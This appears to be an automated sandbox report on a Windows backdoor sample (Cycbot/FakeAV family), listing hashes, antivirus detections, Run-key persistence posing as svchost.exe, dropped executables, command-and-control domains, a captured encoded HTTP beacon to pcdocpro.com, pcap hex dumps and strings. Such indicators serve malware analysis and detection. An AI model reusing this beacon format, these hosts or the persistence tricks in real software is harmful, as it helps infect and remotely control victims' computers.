Analysis Date2015-01-27 06:02:40
MD538f29182e31e79942f9009b2c724d3d1
SHA1cb5c24fae519d1b3e001e719b4cb0ea5587b7db9

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: a9b8eb68e5c5cfd3e9205297220f5fdb sha1: a597b35e3a6a358368239de0becd140699736609 size: 101888
Section.rdata md5: cc5b45ae298e99fae741d5fc19f390bd sha1: 948d3352811008a97c0063a80af846d3d809c788 size: 2048
Section.data md5: 06e3482dfeca14abc5bb89e853cbf3c8 sha1: d746d9671b9a56fbce1460691e31411a2ef424c5 size: 14336
Section.rsrc md5: 3e9fd73291bc841f731d1e8d05068e06 sha1: 68ef3fa288a26fdde780fbadf0e726d3df1af471 size: 1024
Timestamp2005-11-25 15:01:34
VersionPrivateBuild: 1058
FileDescription: Windows Host Process
PEhash74d4a0c82436eb2112cf99f75a171240901aedd2
IMPhash5271c4eaa82c628475473a6b485e607b
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.2
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.2
AVAuthentiumW32/Goolbot.B.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen3
AVBullGuardGen:Trojan.Heur.KS.2
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Agent-217014
AVDr. WebTrojan.Siggen2.8177
AVEmsisoftGen:Trojan.Heur.KS.2
AVEset (nod32)Win32/Cycbot.AA
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.B.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.2
AVGrisoft (avg)Citem.DVA
AVIkarusTrojan.Win32.FakeAV
AVK7Backdoor ( 003210941 )
AVKasperskyPacked.Win32.Krap.hy
AVMalwareBytesTrojan.Agent.Gen
AVMcafeeBackDoor-EXI.gen.d
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.2
AVRisingno_virus
AVSophosTroj/FakeAV-BZD
AVSymantecTrojan.FakeAV!gen39
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwww.google.com
Winsock DNSwww.pcdocpro.com
Winsock DNS127.0.0.1
Winsock DNSblogsmonitoringservice.com
Winsock DNSfindeffectivecasino.com
Winsock DNSbigtelevideochanel.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Network Details:

DNSpcdocpro.com
Type: A
209.59.161.20
DNSwww.google.com
Type: A
74.125.196.105
DNSwww.google.com
Type: A
74.125.196.106
DNSwww.google.com
Type: A
74.125.196.147
DNSwww.google.com
Type: A
74.125.196.99
DNSwww.google.com
Type: A
74.125.196.103
DNSwww.google.com
Type: A
74.125.196.104
DNSwww.pcdocpro.com
Type: A
DNSblogsmonitoringservice.com
Type: A
DNSbigtelevideochanel.com
Type: A
DNSprotectyourpc-11.com
Type: A
DNSfindeffectivecasino.com
Type: A
HTTP GEThttp://www.pcdocpro.com/images/logo-3.jpg?tq=gP4aKydKjynOzpIVkB5XdapacC7DDrssTc323m1hEaJZ%2F57TgsjZV1JiKmKmoR9wb%2FX1ZlMkgT3%2B%2Bv8oXis%2FjRpr2PK3EQBgkh6rUXH8%2BG7l5zT8TLcwOVQdolDdgS9i1rpBxmuRmZb14tI2bP6VeoIfpQ8BC%2B8eWDqf35IKh2gXBFj%2F4WQVc0XZ%2F4%2FL18F9QTFsu3eQ2DSyejr%2BwIkZPgG01FSi%2B0fmqCEReK4Ltq4vWvpcON%2FI%2FUdYQf%2BunOTDs3t1QZeiPRb1xRlAXNpL03ksauKY3zp5fcKBMMY9iiEt4xnTVxpK3zjZabAI2JpyKYhcYLtFxE5%2By
User-Agent: gbot/2.3
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 209.59.161.20:80
Flows TCP192.168.1.1:1032 ➝ 74.125.196.105:80
Flows TCP192.168.1.1:1033 ➝ 74.125.196.105:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 6c6f676f   GET /images/logo
0x00000010 (00016)   2d332e6a 70673f74 713d6750 34614b79   -3.jpg?tq=gP4aKy
0x00000020 (00032)   644b6a79 6e4f7a70 49566b42 35586461   dKjynOzpIVkB5Xda
0x00000030 (00048)   70616343 37444472 73735463 3332336d   pacC7DDrssTc323m
0x00000040 (00064)   31684561 4a5a2532 46353754 67736a5a   1hEaJZ%2F57TgsjZ
0x00000050 (00080)   56314a69 4b6d4b6d 6f523977 62253246   V1JiKmKmoR9wb%2F
0x00000060 (00096)   58315a6c 4d6b6754 33253242 25324276   X1ZlMkgT3%2B%2Bv
0x00000070 (00112)   386f5869 73253246 6a527072 32504b33   8oXis%2FjRpr2PK3
0x00000080 (00128)   45514267 6b683672 55584838 25324247   EQBgkh6rUXH8%2BG
0x00000090 (00144)   376c357a 5438544c 63774f56 51646f6c   7l5zT8TLcwOVQdol
0x000000a0 (00160)   44646753 39693172 7042786d 75526d5a   DdgS9i1rpBxmuRmZ
0x000000b0 (00176)   62313474 49326250 3656656f 49667051   b14tI2bP6VeoIfpQ
0x000000c0 (00192)   38424325 32423865 57447166 3335494b   8BC%2B8eWDqf35IK
0x000000d0 (00208)   68326758 42466a25 32463457 51566330   h2gXBFj%2F4WQVc0
0x000000e0 (00224)   585a2532 46342532 464c3138 46395154   XZ%2F4%2FL18F9QT
0x000000f0 (00240)   46737533 65513244 5379656a 72253242   Fsu3eQ2DSyejr%2B
0x00000100 (00256)   77496b5a 50674730 31465369 25324230   wIkZPgG01FSi%2B0
0x00000110 (00272)   666d7143 4552654b 344c7471 34765776   fmqCEReK4Ltq4vWv
0x00000120 (00288)   70634f4e 25324649 25324655 64595166   pcON%2FI%2FUdYQf
0x00000130 (00304)   25324275 6e4f5444 73337431 515a6569   %2BunOTDs3t1QZei
0x00000140 (00320)   50526231 78526c41 584e704c 30336b73   PRb1xRlAXNpL03ks
0x00000150 (00336)   61754b59 337a7035 66634b42 4d4d5939   auKY3zp5fcKBMMY9
0x00000160 (00352)   69694574 34786e54 5678704b 337a6a5a   iiEt4xnTVxpK3zjZ
0x00000170 (00368)   61624149 324a7079 4b596863 594c7446   abAI2JpyKYhcYLtF
0x00000180 (00384)   78453525 32427920 48545450 2f312e30   xE5%2By HTTP/1.0
0x00000190 (00400)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000001a0 (00416)   6f73650d 0a486f73 743a2077 77772e70   ose..Host: www.p
0x000001b0 (00432)   63646f63 70726f2e 636f6d0d 0a416363   cdocpro.com..Acc
0x000001c0 (00448)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000001d0 (00464)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000001e0 (00480)   0d0a                                  ..

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 46353754 67736a5a    */*....F57TgsjZ
0x00000050 (00080)   56314a69 4b6d4b6d 6f523977 62253246   V1JiKmKmoR9wb%2F
0x00000060 (00096)   58315a6c 4d6b6754 33253242 25324276   X1ZlMkgT3%2B%2Bv
0x00000070 (00112)   386f5869 73253246 6a527072 32504b33   8oXis%2FjRpr2PK3
0x00000080 (00128)   45514267 6b683672 55584838 25324247   EQBgkh6rUXH8%2BG
0x00000090 (00144)   376c357a 5438544c 63774f56 51646f6c   7l5zT8TLcwOVQdol
0x000000a0 (00160)   44646753 39693172 7042786d 75526d5a   DdgS9i1rpBxmuRmZ
0x000000b0 (00176)   62313474 49326250 3656656f 49667051   b14tI2bP6VeoIfpQ
0x000000c0 (00192)   38424325 32423865 57447166 3335494b   8BC%2B8eWDqf35IK
0x000000d0 (00208)   68326758 42466a25 32463457 51566330   h2gXBFj%2F4WQVc0
0x000000e0 (00224)   585a2532 46342532 464c3138 46395154   XZ%2F4%2FL18F9QT
0x000000f0 (00240)   46737533 65513244 5379656a 72253242   Fsu3eQ2DSyejr%2B
0x00000100 (00256)   77496b5a 50674730 31465369 25324230   wIkZPgG01FSi%2B0
0x00000110 (00272)   666d7143 4552654b 344c7471 34765776   fmqCEReK4Ltq4vWv
0x00000120 (00288)   70634f4e 25324649 25324655 64595166   pcON%2FI%2FUdYQf
0x00000130 (00304)   25324275 6e4f5444 73337431 515a6569   %2BunOTDs3t1QZei
0x00000140 (00320)   50526231 78526c41 584e704c 30336b73   PRb1xRlAXNpL03ks
0x00000150 (00336)   61754b59 337a7035 66634b42 4d4d5939   auKY3zp5fcKBMMY9
0x00000160 (00352)   69694574 34786e54 5678704b 337a6a5a   iiEt4xnTVxpK3zjZ
0x00000170 (00368)   61624149 324a7079 4b596863 594c7446   abAI2JpyKYhcYLtF
0x00000180 (00384)   78453525 32427920 48545450 2f312e30   xE5%2By HTTP/1.0
0x00000190 (00400)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000001a0 (00416)   6f73650d 0a486f73 743a2077 77772e70   ose..Host: www.p
0x000001b0 (00432)   63646f63 70726f2e 636f6d0d 0a416363   cdocpro.com..Acc
0x000001c0 (00448)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000001d0 (00464)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000001e0 (00480)   0d0a                                  ..

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 46353754 67736a5a    */*....F57TgsjZ
0x00000050 (00080)   56314a69 4b6d4b6d 6f523977 62253246   V1JiKmKmoR9wb%2F
0x00000060 (00096)   58315a6c 4d6b6754 33253242 25324276   X1ZlMkgT3%2B%2Bv
0x00000070 (00112)   386f5869 73253246 6a527072 32504b33   8oXis%2FjRpr2PK3
0x00000080 (00128)   45514267 6b683672 55584838 25324247   EQBgkh6rUXH8%2BG
0x00000090 (00144)   376c357a 5438544c 63774f56 51646f6c   7l5zT8TLcwOVQdol
0x000000a0 (00160)   44646753 39693172 7042786d 75526d5a   DdgS9i1rpBxmuRmZ
0x000000b0 (00176)   62313474 49326250 3656656f 49667051   b14tI2bP6VeoIfpQ
0x000000c0 (00192)   38424325 32423865 57447166 3335494b   8BC%2B8eWDqf35IK
0x000000d0 (00208)   68326758 42466a25 32463457 51566330   h2gXBFj%2F4WQVc0
0x000000e0 (00224)   585a2532 46342532 464c3138 46395154   XZ%2F4%2FL18F9QT
0x000000f0 (00240)   46737533 65513244 5379656a 72253242   Fsu3eQ2DSyejr%2B
0x00000100 (00256)   77496b5a 50674730 31465369 25324230   wIkZPgG01FSi%2B0
0x00000110 (00272)   666d7143 4552654b 344c7471 34765776   fmqCEReK4Ltq4vWv
0x00000120 (00288)   70634f4e 25324649 25324655 64595166   pcON%2FI%2FUdYQf
0x00000130 (00304)   25324275 6e4f5444 73337431 515a6569   %2BunOTDs3t1QZei
0x00000140 (00320)   50526231 78526c41 584e704c 30336b73   PRb1xRlAXNpL03ks
0x00000150 (00336)   61754b59 337a7035 66634b42 4d4d5939   auKY3zp5fcKBMMY9
0x00000160 (00352)   69694574 34786e54 5678704b 337a6a5a   iiEt4xnTVxpK3zjZ
0x00000170 (00368)   61624149 324a7079 4b596863 594c7446   abAI2JpyKYhcYLtF
0x00000180 (00384)   78453525 32427920 48545450 2f312e30   xE5%2By HTTP/1.0
0x00000190 (00400)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000001a0 (00416)   6f73650d 0a486f73 743a2077 77772e70   ose..Host: www.p
0x000001b0 (00432)   63646f63 70726f2e 636f6d0d 0a416363   cdocpro.com..Acc
0x000001c0 (00448)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000001d0 (00464)   67656e74 3a206762 6f742f32 2e330d0a   gent: gbot/2.3..
0x000001e0 (00480)   0d0a                                  ..


Strings
.
040904b0
1058
FileDescription
&Main
MS Sans Serif
PrivateBuild
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
Windows Host Process
2=2,ft
2cCc\Nn
2ccYft
4NdthV
5^GtuS
,6 |N/
6nA%OC
+;6yFt
8$tOzdtJ
8\YYl{
9>Gt]1
9Hk;uM
>]9nLJi
ADVAPI32.dll
/&@Ae%Y
B"B!Ma
CancelWaitableTimer
cBc!CBy
cdIc-H
CertEnumSystemStoreLocation
cjTVDt
cjYcBH
CloseHandle
ClosePrinter
cNNc=9{
CoInitialize
COMCTL32.dll
CommandLineToArgvW
ConvertSidToStringSidW
ConvertStringSidToSidW
CopySid
CoUninitialize
CRYPT32.dll
CryptMsgClose
CryptMsgGetParam
d>8T^T
@.data
dC@-hT
?De_wJ
& dnt^
DocumentPropertiesA
Dt8|kl{
Dt/,Et
DtHl>J
]Dto4J
dt>$t!
Dty;Gt_
E6Us~l
Et8?]W
etdt?U
=Et<$t
Et=$tQ
ExitProcess
ft9Tje
FtftUl
FtgtL~
ftHi;7
ftj9]DtK
ft>*?T
|]Ft&t
>Ft{tdt
ftWH]"
g`CEGC
GetCommandLineW
GetCurrentProcess
GetCurrentProcessId
GetCurrentThread
GetCurrentThreadId
GetLastError
GetLengthSid
GetModuleHandleA
GetSidIdentifierAuthority
GetSidSubAuthority
GetSidSubAuthorityCount
GetStartupInfoA
GetSystemTimeAsFileTime
GetTickCount
GetTokenInformation
/GtDtTQ
Gt[Gt5
gt:GtA
gtGtetm/
-gt	Jr
;Gt	)JY^M
+G_)xtd/r
,Hco"b
hHhNo@
~hhLoca
'Hi6U8
hj@h`L@
hLibrh
\hThib@
IF'9(D
.=i:.k
InterlockedCompareExchange
InterlockedExchange
IsValidSid
iwXZ]y0
J7O=Ft-W
JdtWEt
j@hFR@
Jpvr/QU
j@w97aw
 Jx-@O
JX.%rgN
KERNEL32.dll
)KliM:
k%t&tx
%	lHb4>Z]q
llsGV,
LoadIconW
LoadStringW
LocalAlloc
LocalFree
L$TQ@P
Lvetz.
*LwFt~
m9GtLy
MessageBoxW
{mgtYl"
NcccEt>
nE1$M*
NETAPI32.dll
NetApiBufferFree
NetUserModalsGet
NGt7Z)W
N(zOl{
odtm+B
O"JMCv
ole32.dll
OMK;ft
OpenPrinterA
OpenProcessToken
OpenThreadToken
?O&t<=
O%tz*Et
OV:Gt	"
p&mOju{N
PostMessageW
ProcessIdToSessionId
PropertySheetW
(]&Q4@
QueryPerformanceCounter
r0	@Bf
`.rdata
RegCloseKey
RegEnumKeyExW
RegEnumValueW
RegOpenKeyExW
r,fbp^
SetUnhandledExceptionFilter
SHELL32.dll
.[szr6B
$t4l/ets
t4TgtA
$t~5u]
t6Ft];x
&t7j8l
t8Ft't	?
t8Hx=^
t8'txgt
t:9<EtR
t9?}gt
T9IEtM
&t9Jtw
tDtet't`
$tDtFtb
t-dtgt
t\?dtm
tdtvgt-dt
TerminateProcess
t]Et,2
t:EtMi
tEt'tnl
't^etuw
]&t<ft
tFtGtK
tftGtt^Ir
t+FtZ't3
tGt^6k3
tgtKgt@
t;-gt&t
$tGt't%t
tgt&tXh
tgtVTShM
!This program cannot be run in DOS mode.
tHl%ta
tIft&t
'tiIM2
tIO;+#
tIuGtet
$tI/)v
tJ/LOP
	'tK)%t
tk\[YdtJ
tL:Etgt
tlEt't
tLEt$tl
%t>lH%tN8
%t\L't
tm'tXq
*~$t]n
'tn\l't
t\N<^n
Tq+mbv
;'t't{
$t{;$t
t:&t8gt
t$t8L-
.&t&ta
t&tdt4
t$tftetL
t%tFto
tThrote
t$tNgt
t%t+}q
t't<&t
t%t'tB
tt&tIEt
t't:=V;
t$tVdtK
t$tX5|
t%t*{y
t'tY=xL
tuGthGt
$tu=^K\
tu[+\v3
tVdtW]
tVX*H>
tWEty7
$t*Wk[
'twO||
tw&t4't%t
'twu	Et
txgtTb
tX~N%t
t}X&tI-
ty6?|8
t+Y\H"
	'tY't
&t?Z[ 
tZlet9
tZUmgt
~udtx$t
]uet=b
<[-?uK
UnhandledExceptionFilter
USER32.dll
u%tl9[
Uu$tW5
(>vTgt
WINSPOOL.DRV
WN{|Ml*}.
w<_@v.
Wy	4n5
WZDtDt
x<77jH
*X?|b'
XEtZ?mUw
xU7gC=
Y5JoV/
{YdtJ.
YEtDtdt$tP
yXEtNT
ZDt(I=
Z	&tgt
Z?Wdtft